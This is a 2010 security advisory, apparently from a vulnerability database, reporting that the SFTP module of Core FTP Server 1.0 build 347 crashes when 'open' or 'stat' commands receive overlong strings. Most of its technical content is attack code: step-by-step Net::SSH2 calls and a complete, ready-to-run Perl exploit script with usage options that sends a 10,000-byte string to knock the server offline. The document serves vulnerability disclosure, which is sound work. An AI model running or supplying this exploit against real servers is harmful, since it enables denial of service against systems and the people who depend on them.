Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23993
HistoryJun 08, 2010 - 12:00 a.m.

Core FTP Server(SFTP module) 'open' and 'stat' Commands Remote Denial of Service Vulnerability

2010-06-0800:00:00
vulners.com
30
JSON

Date of Discovery:
6-Jun-2010

Credits:
leinakesi[at]gmail.com

Vendor:
Core FTP

Affected:
Core FTP Server 1.0 build 347.
Earlier versions may also be affected.

Overview:
Core FTP Server is software for Windows that allows you to exchange files with others via networks and the
internet. Core FTP Server supports SSL/TLS (FTPS), SFTP (SSH2), and clear FTP modes. Several Denial of
Service vulnerabilities exist in SFTP module of Core FTP Server. The unsafe commands include "open","stat",
which can not handle overlength strings properly.

Details:
If you could log on the server successfully, take the following steps and the ftp server will crash which
would lead to Denial of Service attack:
#initialize $FUZZ = "A" x 10000

  1.  $ssh2 = Net::SSH2->new();

  2.  $ssh2->connect($server, $port);

  3.  $ssh2->auth_password($user, $pass);

  4.  $sftp = $ssh2->sftp();

#there are several ways to compromise the server, I list them here as 5.1, 5.2, and etc. …
5.1 $o1 = $sftp->open($FUZZ);
5.2 $o2 = $sftp->open("test", "O_RDWR", $FUZZ);
5.3 $o3 = $sftp->open("test", $FUZZ, 0666);$o3 = $sftp->open("test", $FUZZ, 0666); #twice
5.4 $st = $sftp->stat($FUZZ);
6 $ssh2->disconnect();

Severity:
High

Exploit example:

#!/usr/bin/perl
#leinakesi[at]gmail.com

use Net::SSH2;
use Getopt::Std;

$FUZZ = "A" x 10000;

getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
exit(0);
}

$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";
$sftp = $ssh2->sftp();

#any command of the following would cause Core FTP server crash.
$o1 = $sftp->open($FUZZ);
#$o2 = $sftp->open("test", "O_RDWR", $FUZZ);
#$o3 = $sftp->open("test", $FUZZ, 0666);$o3 = $sftp->open("test", $FUZZ, 0666);
#$st = $sftp->stat($FUZZ);

$ssh2->disconnect();

JSON